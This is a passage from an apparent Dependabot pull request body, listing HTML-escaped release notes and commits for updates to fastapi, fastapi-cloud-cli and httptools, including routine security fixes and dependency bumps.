Add docs references to central contributing docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15580\"\u003e#15580\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update security policy. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15577\"\u003e#15577\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🍱 Update sponsors: TalorData image. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15562\"\u003e#15562\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Update docs, simplify usage of admonitions, only default ones. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15553\"\u003e#15553\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Fix image URLs in \u003ccode\u003eindex.md\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15534\"\u003e#15534\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✏️ Fix Azkaban spelling typo in \u003ccode\u003evirtual-environments.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15463\"\u003e#15463\u003c/a\u003e by \u003ca href=\"https://github.com/isaacbernat\"\u003e\u003ccode\u003e@​isaacbernat\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Improve layout and styling. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15462\"\u003e#15462\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e💄 Refactor opinions section with interactive tabs and new logos. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15458\"\u003e#15458\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e📝 Add FastAPI Conf '26 announcement to docs. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15457\"\u003e#15457\u003c/a\u003e by \u003ca href=\"https://github.com/alejsdev\"\u003e\u003ccode\u003e@​alejsdev\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTranslations\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🌐 Improve translation consistency in \u003ccode\u003e‎docs/pt/docs/advanced/generate-clients.md‎\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15456\"\u003e#15456\u003c/a\u003e by \u003ca href=\"https://github.com/Will-thom\"\u003e\u003ccode\u003e@​Will-thom\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ja (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15530\"\u003e#15530\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for uk (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15529\"\u003e#15529\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for pt (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15528\"\u003e#15528\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for de (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15527\"\u003e#15527\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for tr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15526\"\u003e#15526\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ko (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15525\"\u003e#15525\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh-hant (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15524\"\u003e#15524\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for fr (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15522\"\u003e#15522\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for es (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15523\"\u003e#15523\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for zh (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15520\"\u003e#15520\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Update translations for ru (update-outdated). PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15521\"\u003e#15521\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🌐 Fix typos in Spanish LLM-prompt. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15472\"\u003e#15472\u003c/a\u003e by \u003ca href=\"https://github.com/crr004\"\u003e\u003ccode\u003e@​crr004\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Update tests, don't double dispose the engine. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15587\"\u003e#15587\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⚡️ Speed up test suite via caching and fixture scopes to make it ~24% faster. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/13583\"\u003e#13583\u003c/a\u003e by \u003ca href=\"https://github.com/dikos1337\"\u003e\u003ccode\u003e@​dikos1337\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔥 Remove config files now in central GitHub repo. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15585\"\u003e#15585\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15502\"\u003e#15502\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump idna from 3.11 to 3.15. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15565\"\u003e#15565\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump cloudflare/wrangler-action from 3.15.0 to 4.0.0. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15571\"\u003e#15571\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔧 Migrate docs from MkDocs to Zensical. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15563\"\u003e#15563\u003c/a\u003e by \u003ca href=\"https://github.com/tiangolo\"\u003e\u003ccode\u003e@​tiangolo\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapi/fastapi/pull/15548\"\u003e#15548\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/82064857539e6286522c347b4b11331b48dd2378\"\u003e\u003ccode\u003e8206485\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c910e0139f983d0e04e2d1d235cd71803afeae34\"\u003e\u003ccode\u003ec910e01\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/063b5bf582d31fb155cc6bc6f88cf512329d0fd5\"\u003e\u003ccode\u003e063b5bf\u003c/code\u003e\u003c/a\u003e ♻️ Do not accept underscore headers when using \u003ccode\u003econvert_underscores=True\u003c/code\u003e (th...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/22b02e26f9e8c7e32bd8266e2b0ebe8bb3a0db2b\"\u003e\u003ccode\u003e22b02e2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.136.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3b252a2a22ba27a8ab83d6bde7d9cddbc5bf738e\"\u003e\u003ccode\u003e3b252a2\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/c7fb7851b3389f24c51701d705458989be53ccbb\"\u003e\u003ccode\u003ec7fb785\u003c/code\u003e\u003c/a\u003e ♻️ Validate Server Sent Event fields to avoid applications from sending broke...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/cb83b83dcf78eab4ea17d504db5abcda705fbdc4\"\u003e\u003ccode\u003ecb83b83\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/00f805cec94c0bf48c1f9a563535a3ab2e6f90ab\"\u003e\u003ccode\u003e00f805c\u003c/code\u003e\u003c/a\u003e ✅ Update tests, don't double dispose the engine (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15587\"\u003e#15587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/3675137523dc167981aa3a3c44599b4f3079ccd8\"\u003e\u003ccode\u003e3675137\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapi/fastapi/commit/7b57e42986bb4d40c9eb6580537d13fb8e76097e\"\u003e\u003ccode\u003e7b57e42\u003c/code\u003e\u003c/a\u003e 📝 Document \u003ccode\u003e--entrypoint\u003c/code\u003e CLI option (\u003ca href=\"https://redirect.github.com/fastapi/fastapi/issues/15464\"\u003e#15464\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapi/fastapi/compare/0.136.1...0.136.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fastapi-cloud-cli` from 0.17.1 to 0.18.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/releases\"\u003efastapi-cloud-cli's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.18.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🚸 Show Top-3 files larger than threshold on \u003ccode\u003edeploy\u003c/code\u003e command. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/190\"\u003e#190\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✨ Show if there's a new fastapi-cloud-cli version available. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/201\"\u003e#201\u003c/a\u003e by \u003ca href=\"https://github.com/patrick91\"\u003e\u003ccode\u003e@​patrick91\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Rename \u003ccode\u003eapp_slug\u003c/code\u003e parameter of \u003ccode\u003e_get_app\u003c/code\u003e to \u003ccode\u003eapp_id\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/192\"\u003e#192\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e♻️ Improve message around application directory. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/191\"\u003e#191\u003c/a\u003e by \u003ca href=\"https://github.com/patrick91\"\u003e\u003ccode\u003e@​patrick91\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/197\"\u003e#197\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/194\"\u003e#194\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump fastar from 0.10.0 to 0.11.0. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/188\"\u003e#188\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Add zizmor and fix audit findings. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/183\"\u003e#183\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆️ Bump \u003ccode\u003ety\u003c/code\u003e from 0.0.21 to 0.0.35 and error on warnings. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/195\"\u003e#195\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump actions/labeler from 6.0.1 to 6.1.0. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/193\"\u003e#193\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/blob/main/release-notes.md\"\u003efastapi-cloud-cli's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.18.0 (2026-05-22)\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🚸 Show Top-3 files larger than threshold on \u003ccode\u003edeploy\u003c/code\u003e command. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/190\"\u003e#190\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e✨ Show if there's a new fastapi-cloud-cli version available. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/201\"\u003e#201\u003c/a\u003e by \u003ca href=\"https://github.com/patrick91\"\u003e\u003ccode\u003e@​patrick91\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRefactors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e♻️ Rename \u003ccode\u003eapp_slug\u003c/code\u003e parameter of \u003ccode\u003e_get_app\u003c/code\u003e to \u003ccode\u003eapp_id\u003c/code\u003e. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/192\"\u003e#192\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e♻️ Improve message around application directory. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/191\"\u003e#191\u003c/a\u003e by \u003ca href=\"https://github.com/patrick91\"\u003e\u003ccode\u003e@​patrick91\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternal\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🔒️ Only allow team members to modify dependencies. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/197\"\u003e#197\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump urllib3 from 2.6.3 to 2.7.0. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/194\"\u003e#194\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump fastar from 0.10.0 to 0.11.0. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/188\"\u003e#188\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e🔒️ Add zizmor and fix audit findings. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/183\"\u003e#183\u003c/a\u003e by \u003ca href=\"https://github.com/YuriiMotov\"\u003e\u003ccode\u003e@​YuriiMotov\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆️ Bump \u003ccode\u003ety\u003c/code\u003e from 0.0.21 to 0.0.35 and error on warnings. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/195\"\u003e#195\u003c/a\u003e by \u003ca href=\"https://github.com/svlandeg\"\u003e\u003ccode\u003e@​svlandeg\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e⬆ Bump actions/labeler from 6.0.1 to 6.1.0. PR \u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/pull/193\"\u003e#193\u003c/a\u003e by \u003ca href=\"https://github.com/apps/dependabot\"\u003e\u003ccode\u003e@​dependabot[bot]\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/26541b275a6aaeadad9a27c8177771f5939c2d3f\"\u003e\u003ccode\u003e26541b2\u003c/code\u003e\u003c/a\u003e 🔖 Release version 0.18.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/d3423567b862e67df04144054b2e4b69cc497f17\"\u003e\u003ccode\u003ed342356\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/1ca104f73223a98e2764d99d8c3a1bead23dc22a\"\u003e\u003ccode\u003e1ca104f\u003c/code\u003e\u003c/a\u003e 🚸 Show Top-3 files larger than threshold on \u003ccode\u003edeploy\u003c/code\u003e command (\u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/issues/190\"\u003e#190\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/32a17b8854d6a27464f30e43e83ba73d42b41fe0\"\u003e\u003ccode\u003e32a17b8\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/18b4a43c6e286277a6a9d510b0458d17afc899d0\"\u003e\u003ccode\u003e18b4a43\u003c/code\u003e\u003c/a\u003e ✨ Show if there's a new fastapi-cloud-cli version available (\u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/issues/201\"\u003e#201\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/ce2110b7b97fb57bc6a547b7972fdce01679fe66\"\u003e\u003ccode\u003ece2110b\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/4916f02249b5d703ff7e78cf3c9921b66589b43e\"\u003e\u003ccode\u003e4916f02\u003c/code\u003e\u003c/a\u003e 🔒️ Only allow team members to modify dependencies (\u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/issues/197\"\u003e#197\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/8dae1ac9758bab3d99d0a2b669e551a0ec8a9984\"\u003e\u003ccode\u003e8dae1ac\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/0780b8933ee29ad6cfd7fb7167eaa106cd2d8775\"\u003e\u003ccode\u003e0780b89\u003c/code\u003e\u003c/a\u003e ⬆ Bump urllib3 from 2.6.3 to 2.7.0 (\u003ca href=\"https://redirect.github.com/fastapilabs/fastapi-cloud-cli/issues/194\"\u003e#194\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/commit/8790640da9e24e140d14b928016c6c85f7f62bb8\"\u003e\u003ccode\u003e8790640\u003c/code\u003e\u003c/a\u003e 📝 Update release notes\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastapilabs/fastapi-cloud-cli/compare/0.17.1...0.18.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `httptools` from 0.7.1 to 0.8.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/MagicStack/httptools/releases\"\u003ehttptools's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.8.0\u003c/h2\u003e\n\u003ch1\u003eChanges\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd http-parser and llhttp licenses into the wheels (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/135\"\u003e#135\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/justeph\"\u003e\u003ccode\u003e@​justeph\u003c/code\u003e\u003c/a\u003e in c398a157)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMark cython module as free-threading compatible (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/139\"\u003e#139\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/kumaraditya303\"\u003e\u003ccode\u003e@​kumaraditya303\u003c/code\u003e\u003c/a\u003e in 28d1db15)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix all typing issues (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/134\"\u003e#134\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in a9bda0ed)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eBump llhttp to 9.4.1 (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/145\"\u003e#145\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/fantix\"\u003e\u003ccode\u003e@​fantix\u003c/code\u003e\u003c/a\u003e in e3e8d71e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSecurity: fix URL truncation issue (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/144\"\u003e#144\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/fantix\"\u003e\u003ccode\u003e@​fantix\u003c/code\u003e\u003c/a\u003e in a0283f07 for \u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/142\"\u003e#142\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAllow building with latest setuptools (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/138\"\u003e#138\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/OldManYellsAtCloud\"\u003e\u003ccode\u003e@​OldManYellsAtCloud\u003c/code\u003e\u003c/a\u003e in c403ad1a)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/cf10ce6f0dae56e61817e67b9bb073dd39d0191a\"\u003e\u003ccode\u003ecf10ce6\u003c/code\u003e\u003c/a\u003e httptools 0.8.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/a0283f07c8a7a3f81e26135283daa25e4baba3af\"\u003e\u003ccode\u003ea0283f0\u003c/code\u003e\u003c/a\u003e security: fix URL truncation issue (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/144\"\u003e#144\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 